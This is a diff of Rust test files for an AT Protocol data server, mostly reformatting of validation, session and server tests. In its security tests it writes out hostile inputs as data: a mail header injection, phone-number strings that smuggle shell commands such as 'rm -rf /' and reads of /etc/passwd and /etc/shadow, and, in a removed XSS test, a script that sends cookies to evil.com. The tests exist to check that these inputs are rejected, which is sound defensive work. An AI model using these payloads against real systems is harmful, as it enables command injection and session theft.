"$type": "app.bsky.feed.like",
···
207
},
208
"createdAt": now()
209
});
210
+
assert!(
211
+
matches!(validator.validate(&invalid_subject_uri, "app.bsky.feed.like"), Err(ValidationError::InvalidField { path, .. }) if path.contains("uri"))
212
+
);
213
214
let valid_repost = json!({
215
"$type": "app.bsky.feed.repost",
···
219
},
220
"createdAt": now()
221
});
222
+
assert_eq!(
223
+
validator
224
+
.validate(&valid_repost, "app.bsky.feed.repost")
225
+
.unwrap(),
226
+
ValidationStatus::Valid
227
+
);
228
229
let repost_missing_subject = json!({
230
"$type": "app.bsky.feed.repost",
231
"createdAt": now()
232
});
233
+
assert!(
234
+
matches!(validator.validate(&repost_missing_subject, "app.bsky.feed.repost"), Err(ValidationError::MissingField(f)) if f == "subject")
235
+
);
236
}
237
238
#[test]
···
244
"subject": "did:plc:test12345",
245
"createdAt": now()
246
});
247
+
assert_eq!(
248
+
validator
249
+
.validate(&valid_follow, "app.bsky.graph.follow")
250
+
.unwrap(),
251
+
ValidationStatus::Valid
252
+
);
253
254
let missing_follow_subject = json!({
255
"$type": "app.bsky.graph.follow",
256
"createdAt": now()
257
});
258
+
assert!(
259
+
matches!(validator.validate(&missing_follow_subject, "app.bsky.graph.follow"), Err(ValidationError::MissingField(f)) if f == "subject")
260
+
);
261
262
let invalid_follow_subject = json!({
263
"$type": "app.bsky.graph.follow",
264
"subject": "not-a-did",
265
"createdAt": now()
266
});
267
+
assert!(
268
+
matches!(validator.validate(&invalid_follow_subject, "app.bsky.graph.follow"), Err(ValidationError::InvalidField { path, .. }) if path == "subject")
269
+
);
270
271
let valid_block = json!({
272
"$type": "app.bsky.graph.block",
273
"subject": "did:plc:blocked123",
274
"createdAt": now()
275
});
276
+
assert_eq!(
277
+
validator
278
+
.validate(&valid_block, "app.bsky.graph.block")
279
+
.unwrap(),
280
+
ValidationStatus::Valid
281
+
);
282
283
let invalid_block_subject = json!({
284
"$type": "app.bsky.graph.block",
285
"subject": "not-a-did",
286
"createdAt": now()
287
});
288
+
assert!(
289
+
matches!(validator.validate(&invalid_block_subject, "app.bsky.graph.block"), Err(ValidationError::InvalidField { path, .. }) if path == "subject")
290
+
);
291
}
292
293
#[test]
···
300
"purpose": "app.bsky.graph.defs#modlist",
301
"createdAt": now()
302
});
303
+
assert_eq!(
304
+
validator
305
+
.validate(&valid_list, "app.bsky.graph.list")
306
+
.unwrap(),
307
+
ValidationStatus::Valid
308
+
);
309
310
let list_name_too_long = json!({
311
"$type": "app.bsky.graph.list",
···
313
"purpose": "app.bsky.graph.defs#modlist",
314
"createdAt": now()
315
});
316
+
assert!(
317
+
matches!(validator.validate(&list_name_too_long, "app.bsky.graph.list"), Err(ValidationError::InvalidField { path, .. }) if path == "name")
318
+
);
319
320
let list_empty_name = json!({
321
"$type": "app.bsky.graph.list",
···
323
"purpose": "app.bsky.graph.defs#modlist",
324
"createdAt": now()
325
});
326
+
assert!(
327
+
matches!(validator.validate(&list_empty_name, "app.bsky.graph.list"), Err(ValidationError::InvalidField { path, .. }) if path == "name")
328
+
);
329
330
let valid_list_item = json!({
331
"$type": "app.bsky.graph.listitem",
···
333
"list": "at://did:plc:owner/app.bsky.graph.list/mylist",
334
"createdAt": now()
335
});
336
+
assert_eq!(
337
+
validator
338
+
.validate(&valid_list_item, "app.bsky.graph.listitem")
339
+
.unwrap(),
340
+
ValidationStatus::Valid
341
+
);
342
}
343
344
#[test]
···
351
"displayName": "My Feed",
352
"createdAt": now()
353
});
354
+
assert_eq!(
355
+
validator
356
+
.validate(&valid_generator, "app.bsky.feed.generator")
357
+
.unwrap(),
358
+
ValidationStatus::Valid
359
+
);
360
361
let generator_displayname_too_long = json!({
362
"$type": "app.bsky.feed.generator",
···
364
"displayName": "f".repeat(241),
365
"createdAt": now()
366
});
367
+
assert!(
368
+
matches!(validator.validate(&generator_displayname_too_long, "app.bsky.feed.generator"), Err(ValidationError::InvalidField { path, .. }) if path == "displayName")
369
+
);
370
371
let valid_threadgate = json!({
372
"$type": "app.bsky.feed.threadgate",
373
"post": "at://did:plc:test/app.bsky.feed.post/123",
374
"createdAt": now()
375
});
376
+
assert_eq!(
377
+
validator
378
+
.validate(&valid_threadgate, "app.bsky.feed.threadgate")
379
+
.unwrap(),
380
+
ValidationStatus::Valid
381
+
);
382
383
let valid_labeler = json!({
384
"$type": "app.bsky.labeler.service",
···
387
},
388
"createdAt": now()
389
});
390
+
assert_eq!(
391
+
validator
392
+
.validate(&valid_labeler, "app.bsky.labeler.service")
393
+
.unwrap(),
394
+
ValidationStatus::Valid
395
+
);
396
}
397
398
#[test]
···
404
"$type": "com.custom.record",
405
"data": "test"
406
});
407
+
assert_eq!(
408
+
validator
409
+
.validate(&custom_record, "com.custom.record")
410
+
.unwrap(),
411
+
ValidationStatus::Unknown
412
+
);
413
+
assert!(matches!(
414
+
strict_validator.validate(&custom_record, "com.custom.record"),
415
+
Err(ValidationError::UnknownType(_))
416
+
));
417
418
let type_mismatch = json!({
419
"$type": "app.bsky.feed.like",
···
428
let missing_type = json!({
429
"text": "Hello"
430
});
431
+
assert!(matches!(
432
+
validator.validate(&missing_type, "app.bsky.feed.post"),
433
+
Err(ValidationError::MissingType)
434
+
));
435
436
let not_object = json!("just a string");
437
+
assert!(matches!(
438
+
validator.validate(¬_object, "app.bsky.feed.post"),
439
+
Err(ValidationError::InvalidRecord(_))
440
+
));
441
442
let valid_datetime = json!({
443
"$type": "app.bsky.feed.post",
444
"text": "Test",
445
"createdAt": "2024-01-15T10:30:00.000Z"
446
});
447
+
assert_eq!(
448
+
validator
449
+
.validate(&valid_datetime, "app.bsky.feed.post")
450
+
.unwrap(),
451
+
ValidationStatus::Valid
452
+
);
453
454
let datetime_with_offset = json!({
455
"$type": "app.bsky.feed.post",
456
"text": "Test",
457
"createdAt": "2024-01-15T10:30:00+05:30"
458
});
459
+
assert_eq!(
460
+
validator
461
+
.validate(&datetime_with_offset, "app.bsky.feed.post")
462
+
.unwrap(),
463
+
ValidationStatus::Valid
464
+
);
465
466
let invalid_datetime = json!({
467
"$type": "app.bsky.feed.post",
468
"text": "Test",
469
"createdAt": "2024/01/15"
470
});
471
+
assert!(matches!(
472
+
validator.validate(&invalid_datetime, "app.bsky.feed.post"),
473
+
Err(ValidationError::InvalidDatetime { .. })
474
+
));
475
}
476
477
#[test]
···
483
assert!(validate_record_key("valid~key").is_ok());
484
assert!(validate_record_key("self").is_ok());
485
486
+
assert!(matches!(
487
+
validate_record_key(""),
488
+
Err(ValidationError::InvalidRecord(_))
489
+
));
490
491
assert!(validate_record_key(".").is_err());
492
assert!(validate_record_key("..").is_err());
···
496
assert!(validate_record_key("invalid@key").is_err());
497
assert!(validate_record_key("invalid#key").is_err());
498
499
+
assert!(matches!(
500
+
validate_record_key(&"k".repeat(513)),
501
+
Err(ValidationError::InvalidRecord(_))
502
+
));
503
assert!(validate_record_key(&"k".repeat(512)).is_ok());
504
}
505
···
510
assert!(validate_collection_nsid("a.b.c").is_ok());
511
assert!(validate_collection_nsid("my-app.domain.record-type").is_ok());
512
513
+
assert!(matches!(
514
+
validate_collection_nsid(""),
515
+
Err(ValidationError::InvalidRecord(_))
516
+
));
517
518
assert!(validate_collection_nsid("a").is_err());
519
assert!(validate_collection_nsid("a.b").is_err());
+31
-76
tests/security_fixes.rs
+31
-76
tests/security_fixes.rs
···
1
mod common;
2
-
use tranquil_pds::image::{ImageError, ImageProcessor};
3
use tranquil_pds::comms::{SendError, is_valid_phone_number, sanitize_header_value};
4
-
use tranquil_pds::oauth::templates::{error_page, login_page, success_page};
5
6
#[test]
7
fn test_header_injection_sanitization() {
···
24
let header_injection = "Normal Subject\r\nBcc: attacker@evil.com\r\nX-Injected: value";
25
let sanitized = sanitize_header_value(header_injection);
26
assert_eq!(sanitized.split("\r\n").count(), 1);
27
-
assert!(sanitized.contains("Normal Subject") && sanitized.contains("Bcc:") && sanitized.contains("X-Injected:"));
28
29
let with_null = "client\0id";
30
assert!(sanitize_header_value(with_null).contains("client"));
···
59
assert!(!is_valid_phone_number("+1(234)567890"));
60
assert!(!is_valid_phone_number("+1.234.567.890"));
61
62
-
for malicious in ["+123; rm -rf /", "+123 && cat /etc/passwd", "+123`id`",
63
-
"+123$(whoami)", "+123|cat /etc/shadow", "+123\n--help",
64
-
"+123\r\n--version", "+123--help"] {
65
-
assert!(!is_valid_phone_number(malicious), "Command injection '{}' should be rejected", malicious);
66
}
67
}
68
···
88
}
89
90
#[test]
91
-
fn test_oauth_template_xss_protection() {
92
-
let html = login_page("<script>alert('xss')</script>", None, None, "test-uri", None, None);
93
-
assert!(!html.contains("<script>") && html.contains("<script>"));
94
-
95
-
let html = login_page("client123", Some("<img src=x onerror=alert('xss')>"), None, "test-uri", None, None);
96
-
assert!(!html.contains("<img ") && html.contains("<img"));
97
-
98
-
let html = login_page("client123", None, Some("\"><script>alert('xss')</script>"), "test-uri", None, None);
99
-
assert!(!html.contains("<script>"));
100
-
101
-
let html = login_page("client123", None, None, "test-uri",
102
-
Some("<script>document.location='http://evil.com?c='+document.cookie</script>"), None);
103
-
assert!(!html.contains("<script>"));
104
-
105
-
let html = login_page("client123", None, None, "test-uri", None,
106
-
Some("\" onfocus=\"alert('xss')\" autofocus=\""));
107
-
assert!(!html.contains("onfocus=\"alert") && html.contains("""));
108
-
109
-
let html = login_page("client123", None, None, "\" onmouseover=\"alert('xss')\"", None, None);
110
-
assert!(!html.contains("onmouseover=\"alert"));
111
-
112
-
let html = error_page("<script>steal()</script>", Some("<img src=x onerror=evil()>"));
113
-
assert!(!html.contains("<script>") && !html.contains("<img "));
114
-
115
-
let html = success_page(Some("<script>steal_session()</script>"));
116
-
assert!(!html.contains("<script>"));
117
-
118
-
for (page, name) in [
119
-
(login_page("client", None, None, "uri", None, None), "login"),
120
-
(error_page("err", None), "error"),
121
-
(success_page(None), "success"),
122
-
] {
123
-
assert!(!page.contains("javascript:"), "{} page has javascript: URL", name);
124
-
}
125
-
126
-
let html = login_page("client123", None, None, "javascript:alert('xss')//", None, None);
127
-
assert!(html.contains("action=\"/oauth/authorize\""));
128
-
}
129
-
130
-
#[test]
131
-
fn test_oauth_template_html_escaping() {
132
-
let html = login_page("client&test", None, None, "test-uri", None, None);
133
-
assert!(html.contains("&") && !html.contains("client&test"));
134
-
135
-
let html = login_page("client\"test'more", None, None, "test-uri", None, None);
136
-
assert!(html.contains(""") || html.contains("""));
137
-
assert!(html.contains("'") || html.contains("'"));
138
-
139
-
let html = login_page("client<test>more", None, None, "test-uri", None, None);
140
-
assert!(html.contains("<") && html.contains(">") && !html.contains("<test>"));
141
-
142
-
let html = login_page("my-safe-client", Some("My Safe App"), Some("read write"),
143
-
"valid-uri", None, Some("user@example.com"));
144
-
assert!(html.contains("my-safe-client") || html.contains("My Safe App"));
145
-
assert!(html.contains("read write") || html.contains("read"));
146
-
assert!(html.contains("user@example.com"));
147
-
148
-
let html = login_page("client", None, None, "\" onclick=\"alert('csrf')", None, None);
149
-
assert!(!html.contains("onclick=\"alert"));
150
-
151
-
let html = login_page("客户端 クライアント", None, None, "test-uri", None, None);
152
-
assert!(html.contains("客户端") || html.contains("&#"));
153
-
}
154
-
155
-
#[test]
156
fn test_send_error_display() {
157
let timeout = SendError::Timeout;
158
assert!(!format!("{}", timeout).is_empty());
···
173
let base = base_url().await;
174
let http_client = client();
175
176
-
let res = http_client.get(format!("{}/xrpc/com.atproto.temp.checkSignupQueue", base))
177
-
.send().await.unwrap();
178
assert_eq!(res.status(), reqwest::StatusCode::OK);
179
let body: serde_json::Value = res.json().await.unwrap();
180
assert_eq!(body["activated"], true);
181
182
let (token, _did) = create_account_and_login(&http_client).await;
183
-
let res = http_client.get(format!("{}/xrpc/com.atproto.temp.checkSignupQueue", base))
184
.header("Authorization", format!("Bearer {}", token))
185
-
.send().await.unwrap();
186
assert_eq!(res.status(), reqwest::StatusCode::OK);
187
let body: serde_json::Value = res.json().await.unwrap();
188
assert_eq!(body["activated"], true);
···
1
mod common;
2
use tranquil_pds::comms::{SendError, is_valid_phone_number, sanitize_header_value};
3
+
use tranquil_pds::image::{ImageError, ImageProcessor};
4
5
#[test]
6
fn test_header_injection_sanitization() {
···
23
let header_injection = "Normal Subject\r\nBcc: attacker@evil.com\r\nX-Injected: value";
24
let sanitized = sanitize_header_value(header_injection);
25
assert_eq!(sanitized.split("\r\n").count(), 1);
26
+
assert!(
27
+
sanitized.contains("Normal Subject")
28
+
&& sanitized.contains("Bcc:")
29
+
&& sanitized.contains("X-Injected:")
30
+
);
31
32
let with_null = "client\0id";
33
assert!(sanitize_header_value(with_null).contains("client"));
···
62
assert!(!is_valid_phone_number("+1(234)567890"));
63
assert!(!is_valid_phone_number("+1.234.567.890"));
64
65
+
for malicious in [
66
+
"+123; rm -rf /",
67
+
"+123 && cat /etc/passwd",
68
+
"+123`id`",
69
+
"+123$(whoami)",
70
+
"+123|cat /etc/shadow",
71
+
"+123\n--help",
72
+
"+123\r\n--version",
73
+
"+123--help",
74
+
] {
75
+
assert!(
76
+
!is_valid_phone_number(malicious),
77
+
"Command injection '{}' should be rejected",
78
+
malicious
79
+
);
80
}
81
}
82
···
102
}
103
104
#[test]
105
fn test_send_error_display() {
106
let timeout = SendError::Timeout;
107
assert!(!format!("{}", timeout).is_empty());
···
122
let base = base_url().await;
123
let http_client = client();
124
125
+
let res = http_client
126
+
.get(format!("{}/xrpc/com.atproto.temp.checkSignupQueue", base))
127
+
.send()
128
+
.await
129
+
.unwrap();
130
assert_eq!(res.status(), reqwest::StatusCode::OK);
131
let body: serde_json::Value = res.json().await.unwrap();
132
assert_eq!(body["activated"], true);
133
134
let (token, _did) = create_account_and_login(&http_client).await;
135
+
let res = http_client
136
+
.get(format!("{}/xrpc/com.atproto.temp.checkSignupQueue", base))
137
.header("Authorization", format!("Bearer {}", token))
138
+
.send()
139
+
.await
140
+
.unwrap();
141
assert_eq!(res.status(), reqwest::StatusCode::OK);
142
let body: serde_json::Value = res.json().await.unwrap();
143
assert_eq!(body["activated"], true);
+112
-33
tests/server.rs
+112
-33
tests/server.rs
···
12
let health = client.get(format!("{}/health", base)).send().await.unwrap();
13
assert_eq!(health.status(), StatusCode::OK);
14
assert_eq!(health.text().await.unwrap(), "OK");
15
-
let describe = client.get(format!("{}/xrpc/com.atproto.server.describeServer", base)).send().await.unwrap();
16
assert_eq!(describe.status(), StatusCode::OK);
17
let body: Value = describe.json().await.unwrap();
18
assert!(body.get("availableUserDomains").is_some());
···
24
let base = base_url().await;
25
let handle = format!("user_{}", uuid::Uuid::new_v4());
26
let payload = json!({ "handle": handle, "email": format!("{}@example.com", handle), "password": "password" });
27
-
let create_res = client.post(format!("{}/xrpc/com.atproto.server.createAccount", base))
28
-
.json(&payload).send().await.unwrap();
29
assert_eq!(create_res.status(), StatusCode::OK);
30
let create_body: Value = create_res.json().await.unwrap();
31
let did = create_body["did"].as_str().unwrap();
32
let _ = verify_new_account(&client, did).await;
33
-
let login = client.post(format!("{}/xrpc/com.atproto.server.createSession", base))
34
-
.json(&json!({ "identifier": handle, "password": "password" })).send().await.unwrap();
35
assert_eq!(login.status(), StatusCode::OK);
36
let login_body: Value = login.json().await.unwrap();
37
let access_jwt = login_body["accessJwt"].as_str().unwrap().to_string();
38
let refresh_jwt = login_body["refreshJwt"].as_str().unwrap().to_string();
39
-
let refresh = client.post(format!("{}/xrpc/com.atproto.server.refreshSession", base))
40
-
.bearer_auth(&refresh_jwt).send().await.unwrap();
41
assert_eq!(refresh.status(), StatusCode::OK);
42
let refresh_body: Value = refresh.json().await.unwrap();
43
assert!(refresh_body["accessJwt"].as_str().is_some());
44
assert_ne!(refresh_body["accessJwt"].as_str().unwrap(), access_jwt);
45
assert_ne!(refresh_body["refreshJwt"].as_str().unwrap(), refresh_jwt);
46
-
let missing_id = client.post(format!("{}/xrpc/com.atproto.server.createSession", base))
47
-
.json(&json!({ "password": "password" })).send().await.unwrap();
48
-
assert!(missing_id.status() == StatusCode::BAD_REQUEST || missing_id.status() == StatusCode::UNPROCESSABLE_ENTITY);
49
let invalid_handle = client.post(format!("{}/xrpc/com.atproto.server.createAccount", base))
50
.json(&json!({ "handle": "invalid!handle.com", "email": "test@example.com", "password": "password" }))
51
.send().await.unwrap();
52
assert_eq!(invalid_handle.status(), StatusCode::BAD_REQUEST);
53
-
let unauth_session = client.get(format!("{}/xrpc/com.atproto.server.getSession", base))
54
-
.bearer_auth(AUTH_TOKEN).send().await.unwrap();
55
assert_eq!(unauth_session.status(), StatusCode::UNAUTHORIZED);
56
-
let delete_session = client.post(format!("{}/xrpc/com.atproto.server.deleteSession", base))
57
-
.bearer_auth(AUTH_TOKEN).send().await.unwrap();
58
assert_eq!(delete_session.status(), StatusCode::UNAUTHORIZED);
59
}
60
···
63
let client = client();
64
let base = base_url().await;
65
let (access_jwt, did) = create_account_and_login(&client).await;
66
-
let res = client.get(format!("{}/xrpc/com.atproto.server.getServiceAuth", base))
67
-
.bearer_auth(&access_jwt).query(&[("aud", "did:web:example.com")]).send().await.unwrap();
68
assert_eq!(res.status(), StatusCode::OK);
69
let body: Value = res.json().await.unwrap();
70
let token = body["token"].as_str().unwrap();
···
76
assert_eq!(claims["iss"], did);
77
assert_eq!(claims["sub"], did);
78
assert_eq!(claims["aud"], "did:web:example.com");
79
-
let lxm_res = client.get(format!("{}/xrpc/com.atproto.server.getServiceAuth", base))
80
-
.bearer_auth(&access_jwt).query(&[("aud", "did:web:example.com"), ("lxm", "com.atproto.repo.getRecord")])
81
-
.send().await.unwrap();
82
assert_eq!(lxm_res.status(), StatusCode::OK);
83
let lxm_body: Value = lxm_res.json().await.unwrap();
84
let lxm_token = lxm_body["token"].as_str().unwrap();
···
86
let lxm_payload = URL_SAFE_NO_PAD.decode(lxm_parts[1]).unwrap();
87
let lxm_claims: Value = serde_json::from_slice(&lxm_payload).unwrap();
88
assert_eq!(lxm_claims["lxm"], "com.atproto.repo.getRecord");
89
-
let unauth = client.get(format!("{}/xrpc/com.atproto.server.getServiceAuth", base))
90
-
.query(&[("aud", "did:web:example.com")]).send().await.unwrap();
91
assert_eq!(unauth.status(), StatusCode::UNAUTHORIZED);
92
-
let missing_aud = client.get(format!("{}/xrpc/com.atproto.server.getServiceAuth", base))
93
-
.bearer_auth(&access_jwt).send().await.unwrap();
94
assert_eq!(missing_aud.status(), StatusCode::BAD_REQUEST);
95
}
96
···
99
let client = client();
100
let base = base_url().await;
101
let (access_jwt, _) = create_account_and_login(&client).await;
102
-
let status = client.get(format!("{}/xrpc/com.atproto.server.checkAccountStatus", base))
103
-
.bearer_auth(&access_jwt).send().await.unwrap();
104
assert_eq!(status.status(), StatusCode::OK);
105
let body: Value = status.json().await.unwrap();
106
assert_eq!(body["activated"], true);
···
108
assert!(body["repoCommit"].is_string());
109
assert!(body["repoRev"].is_string());
110
assert!(body["indexedRecords"].is_number());
111
-
let unauth_status = client.get(format!("{}/xrpc/com.atproto.server.checkAccountStatus", base))
112
-
.send().await.unwrap();
113
assert_eq!(unauth_status.status(), StatusCode::UNAUTHORIZED);
114
-
let activate = client.post(format!("{}/xrpc/com.atproto.server.activateAccount", base))
115
-
.bearer_auth(&access_jwt).send().await.unwrap();
116
assert_eq!(activate.status(), StatusCode::OK);
117
-
let unauth_activate = client.post(format!("{}/xrpc/com.atproto.server.activateAccount", base))
118
-
.send().await.unwrap();
119
assert_eq!(unauth_activate.status(), StatusCode::UNAUTHORIZED);
120
-
let deactivate = client.post(format!("{}/xrpc/com.atproto.server.deactivateAccount", base))
121
-
.bearer_auth(&access_jwt).json(&json!({})).send().await.unwrap();
122
assert_eq!(deactivate.status(), StatusCode::OK);
123
}
···
12
let health = client.get(format!("{}/health", base)).send().await.unwrap();
13
assert_eq!(health.status(), StatusCode::OK);
14
assert_eq!(health.text().await.unwrap(), "OK");
15
+
let describe = client
16
+
.get(format!("{}/xrpc/com.atproto.server.describeServer", base))
17
+
.send()
18
+
.await
19
+
.unwrap();
20
assert_eq!(describe.status(), StatusCode::OK);
21
let body: Value = describe.json().await.unwrap();
22
assert!(body.get("availableUserDomains").is_some());
···
28
let base = base_url().await;
29
let handle = format!("user_{}", uuid::Uuid::new_v4());
30
let payload = json!({ "handle": handle, "email": format!("{}@example.com", handle), "password": "password" });
31
+
let create_res = client
32
+
.post(format!("{}/xrpc/com.atproto.server.createAccount", base))
33
+
.json(&payload)
34
+
.send()
35
+
.await
36
+
.unwrap();
37
assert_eq!(create_res.status(), StatusCode::OK);
38
let create_body: Value = create_res.json().await.unwrap();
39
let did = create_body["did"].as_str().unwrap();
40
let _ = verify_new_account(&client, did).await;
41
+
let login = client
42
+
.post(format!("{}/xrpc/com.atproto.server.createSession", base))
43
+
.json(&json!({ "identifier": handle, "password": "password" }))
44
+
.send()
45
+
.await
46
+
.unwrap();
47
assert_eq!(login.status(), StatusCode::OK);
48
let login_body: Value = login.json().await.unwrap();
49
let access_jwt = login_body["accessJwt"].as_str().unwrap().to_string();
50
let refresh_jwt = login_body["refreshJwt"].as_str().unwrap().to_string();
51
+
let refresh = client
52
+
.post(format!("{}/xrpc/com.atproto.server.refreshSession", base))
53
+
.bearer_auth(&refresh_jwt)
54
+
.send()
55
+
.await
56
+
.unwrap();
57
assert_eq!(refresh.status(), StatusCode::OK);
58
let refresh_body: Value = refresh.json().await.unwrap();
59
assert!(refresh_body["accessJwt"].as_str().is_some());
60
assert_ne!(refresh_body["accessJwt"].as_str().unwrap(), access_jwt);
61
assert_ne!(refresh_body["refreshJwt"].as_str().unwrap(), refresh_jwt);
62
+
let missing_id = client
63
+
.post(format!("{}/xrpc/com.atproto.server.createSession", base))
64
+
.json(&json!({ "password": "password" }))
65
+
.send()
66
+
.await
67
+
.unwrap();
68
+
assert!(
69
+
missing_id.status() == StatusCode::BAD_REQUEST
70
+
|| missing_id.status() == StatusCode::UNPROCESSABLE_ENTITY
71
+
);
72
let invalid_handle = client.post(format!("{}/xrpc/com.atproto.server.createAccount", base))
73
.json(&json!({ "handle": "invalid!handle.com", "email": "test@example.com", "password": "password" }))
74
.send().await.unwrap();
75
assert_eq!(invalid_handle.status(), StatusCode::BAD_REQUEST);
76
+
let unauth_session = client
77
+
.get(format!("{}/xrpc/com.atproto.server.getSession", base))
78
+
.bearer_auth(AUTH_TOKEN)
79
+
.send()
80
+
.await
81
+
.unwrap();
82
assert_eq!(unauth_session.status(), StatusCode::UNAUTHORIZED);
83
+
let delete_session = client
84
+
.post(format!("{}/xrpc/com.atproto.server.deleteSession", base))
85
+
.bearer_auth(AUTH_TOKEN)
86
+
.send()
87
+
.await
88
+
.unwrap();
89
assert_eq!(delete_session.status(), StatusCode::UNAUTHORIZED);
90
}
91
···
94
let client = client();
95
let base = base_url().await;
96
let (access_jwt, did) = create_account_and_login(&client).await;
97
+
let res = client
98
+
.get(format!("{}/xrpc/com.atproto.server.getServiceAuth", base))
99
+
.bearer_auth(&access_jwt)
100
+
.query(&[("aud", "did:web:example.com")])
101
+
.send()
102
+
.await
103
+
.unwrap();
104
assert_eq!(res.status(), StatusCode::OK);
105
let body: Value = res.json().await.unwrap();
106
let token = body["token"].as_str().unwrap();
···
112
assert_eq!(claims["iss"], did);
113
assert_eq!(claims["sub"], did);
114
assert_eq!(claims["aud"], "did:web:example.com");
115
+
let lxm_res = client
116
+
.get(format!("{}/xrpc/com.atproto.server.getServiceAuth", base))
117
+
.bearer_auth(&access_jwt)
118
+
.query(&[
119
+
("aud", "did:web:example.com"),
120
+
("lxm", "com.atproto.repo.getRecord"),
121
+
])
122
+
.send()
123
+
.await
124
+
.unwrap();
125
assert_eq!(lxm_res.status(), StatusCode::OK);
126
let lxm_body: Value = lxm_res.json().await.unwrap();
127
let lxm_token = lxm_body["token"].as_str().unwrap();
···
129
let lxm_payload = URL_SAFE_NO_PAD.decode(lxm_parts[1]).unwrap();
130
let lxm_claims: Value = serde_json::from_slice(&lxm_payload).unwrap();
131
assert_eq!(lxm_claims["lxm"], "com.atproto.repo.getRecord");
132
+
let unauth = client
133
+
.get(format!("{}/xrpc/com.atproto.server.getServiceAuth", base))
134
+
.query(&[("aud", "did:web:example.com")])
135
+
.send()
136
+
.await
137
+
.unwrap();
138
assert_eq!(unauth.status(), StatusCode::UNAUTHORIZED);
139
+
let missing_aud = client
140
+
.get(format!("{}/xrpc/com.atproto.server.getServiceAuth", base))
141
+
.bearer_auth(&access_jwt)
142
+
.send()
143
+
.await
144
+
.unwrap();
145
assert_eq!(missing_aud.status(), StatusCode::BAD_REQUEST);
146
}
147
···
150
let client = client();
151
let base = base_url().await;
152
let (access_jwt, _) = create_account_and_login(&client).await;
153
+
let status = client
154
+
.get(format!(
155
+
"{}/xrpc/com.atproto.server.checkAccountStatus",
156
+
base
157
+
))
158
+
.bearer_auth(&access_jwt)
159
+
.send()
160
+
.await
161
+
.unwrap();
162
assert_eq!(status.status(), StatusCode::OK);
163
let body: Value = status.json().await.unwrap();
164
assert_eq!(body["activated"], true);
···
166
assert!(body["repoCommit"].is_string());
167
assert!(body["repoRev"].is_string());
168
assert!(body["indexedRecords"].is_number());
169
+
let unauth_status = client
170
+
.get(format!(
171
+
"{}/xrpc/com.atproto.server.checkAccountStatus",
172
+
base
173
+
))
174
+
.send()
175
+
.await
176
+
.unwrap();
177
assert_eq!(unauth_status.status(), StatusCode::UNAUTHORIZED);
178
+
let activate = client
179
+
.post(format!("{}/xrpc/com.atproto.server.activateAccount", base))
180
+
.bearer_auth(&access_jwt)
181
+
.send()
182
+
.await
183
+
.unwrap();
184
assert_eq!(activate.status(), StatusCode::OK);
185
+
let unauth_activate = client
186
+
.post(format!("{}/xrpc/com.atproto.server.activateAccount", base))
187
+
.send()
188
+
.await
189
+
.unwrap();
190
assert_eq!(unauth_activate.status(), StatusCode::UNAUTHORIZED);
191
+
let deactivate = client
192
+
.post(format!(
193
+
"{}/xrpc/com.atproto.server.deactivateAccount",
194
+
base
195
+
))
196
+
.bearer_auth(&access_jwt)
197
+
.json(&json!({}))
198
+
.send()
199
+
.await
200
+
.unwrap();
201
assert_eq!(deactivate.status(), StatusCode::OK);
202
}
+33
-9
tests/session_management.rs
+33
-9
tests/session_management.rs
···
20
.expect("Failed to send request");
21
assert_eq!(res.status(), StatusCode::OK);
22
let body: Value = res.json().await.unwrap();
23
-
let sessions = body["sessions"].as_array().expect("sessions should be array");
24
assert!(!sessions.is_empty(), "Should have at least one session");
25
-
let current = sessions.iter().find(|s| s["isCurrent"].as_bool() == Some(true));
26
assert!(current.is_some(), "Should have a current session marked");
27
let session = current.unwrap();
28
assert!(session["id"].as_str().is_some(), "Session should have id");
29
-
assert!(session["createdAt"].as_str().is_some(), "Session should have createdAt");
30
-
assert!(session["expiresAt"].as_str().is_some(), "Session should have expiresAt");
31
let _ = did;
32
}
33
···
84
assert_eq!(list_res.status(), StatusCode::OK);
85
let list_body: Value = list_res.json().await.unwrap();
86
let sessions = list_body["sessions"].as_array().unwrap();
87
-
assert!(sessions.len() >= 2, "Should have at least 2 sessions, got {}", sessions.len());
88
let _ = jwt1;
89
}
90
···
154
.expect("Failed to list sessions");
155
let list_body: Value = list_res.json().await.unwrap();
156
let sessions = list_body["sessions"].as_array().unwrap();
157
-
let other_session = sessions.iter().find(|s| s["isCurrent"].as_bool() != Some(true));
158
-
assert!(other_session.is_some(), "Should have another session to revoke");
159
let session_id = other_session.unwrap()["id"].as_str().unwrap();
160
let revoke_res = client
161
.post(format!(
···
179
.expect("Failed to list sessions after revoke");
180
let list_after_body: Value = list_after_res.json().await.unwrap();
181
let sessions_after = list_after_body["sessions"].as_array().unwrap();
182
-
let revoked_still_exists = sessions_after.iter().any(|s| s["id"].as_str() == Some(session_id));
183
-
assert!(!revoked_still_exists, "Revoked session should not appear in list");
184
let _ = jwt1;
185
}
186
···
20
.expect("Failed to send request");
21
assert_eq!(res.status(), StatusCode::OK);
22
let body: Value = res.json().await.unwrap();
23
+
let sessions = body["sessions"]
24
+
.as_array()
25
+
.expect("sessions should be array");
26
assert!(!sessions.is_empty(), "Should have at least one session");
27
+
let current = sessions
28
+
.iter()
29
+
.find(|s| s["isCurrent"].as_bool() == Some(true));
30
assert!(current.is_some(), "Should have a current session marked");
31
let session = current.unwrap();
32
assert!(session["id"].as_str().is_some(), "Session should have id");
33
+
assert!(
34
+
session["createdAt"].as_str().is_some(),
35
+
"Session should have createdAt"
36
+
);
37
+
assert!(
38
+
session["expiresAt"].as_str().is_some(),
39
+
"Session should have expiresAt"
40
+
);
41
let _ = did;
42
}
43
···
94
assert_eq!(list_res.status(), StatusCode::OK);
95
let list_body: Value = list_res.json().await.unwrap();
96
let sessions = list_body["sessions"].as_array().unwrap();
97
+
assert!(
98
+
sessions.len() >= 2,
99
+
"Should have at least 2 sessions, got {}",
100
+
sessions.len()
101
+
);
102
let _ = jwt1;
103
}
104
···
168
.expect("Failed to list sessions");
169
let list_body: Value = list_res.json().await.unwrap();
170
let sessions = list_body["sessions"].as_array().unwrap();
171
+
let other_session = sessions
172
+
.iter()
173
+
.find(|s| s["isCurrent"].as_bool() != Some(true));
174
+
assert!(
175
+
other_session.is_some(),
176
+
"Should have another session to revoke"
177
+
);
178
let session_id = other_session.unwrap()["id"].as_str().unwrap();
179
let revoke_res = client
180
.post(format!(
···
198
.expect("Failed to list sessions after revoke");
199
let list_after_body: Value = list_after_res.json().await.unwrap();
200
let sessions_after = list_after_body["sessions"].as_array().unwrap();
201
+
let revoked_still_exists = sessions_after
202
+
.iter()
203
+
.any(|s| s["id"].as_str() == Some(session_id));
204
+
assert!(
205
+
!revoked_still_exists,
206
+
"Revoked session should not appear in list"
207
+
);
208
let _ = jwt1;
209
}
210
+113
-31
tests/sync_deprecated.rs
+113
-31
